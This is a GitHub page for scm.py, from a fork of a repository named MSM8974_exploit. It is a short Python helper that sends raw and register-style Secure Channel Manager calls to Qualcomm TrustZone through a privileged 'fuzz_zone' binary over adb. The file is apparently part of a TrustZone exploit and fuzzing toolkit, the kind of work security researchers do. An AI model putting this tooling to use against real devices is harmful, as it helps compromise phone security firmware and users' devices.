forked from laginimaineb/MSM8974_exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathscm.py
26 lines (22 loc) · 1.21 KB
/
scm.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import re
from adb import *
from consts import *
def execute_register_scm(svc_id, cmd_id, args):
'''
Sends a register SCM using fuzz_zone with the given arguments.
Returns the error value returned by the IOCTL
'''
if len(args) > REGISTER_SCM_SUPPORTED_ARGS:
raise "Execute register SCM currently supports only up to %d parameters" % REGISTER_SCM_SUPPORTED_ARGS
args_str = " ".join(["%08X" % arg for arg in args]).strip()
command_str = "%s reg %d %d %d %s" % (FUZZ_ZONE_PATH, svc_id, cmd_id, len(args), args_str)
resp_str = execute_privileged_command(command_str)
if resp_str.find("Failed") >= 0:
raise "Failed to send register SCM! %s" % resp_str
return int(re.search("^IOCTL RES: (\d+)", resp_str, re.MULTILINE).group(1))
def execute_raw_scm(svc_id, cmd_id, request_data, response_length):
'''
Sends a "normal" SCM using fuzz_zone with the given arguments, and returns the resulting buffer
'''
resp = execute_privileged_command("%s raw %d %d %s %d" % (FUZZ_ZONE_PATH, svc_id, cmd_id, request_data.encode("hex"), response_length))
return resp.split("\n")[-2].decode("hex")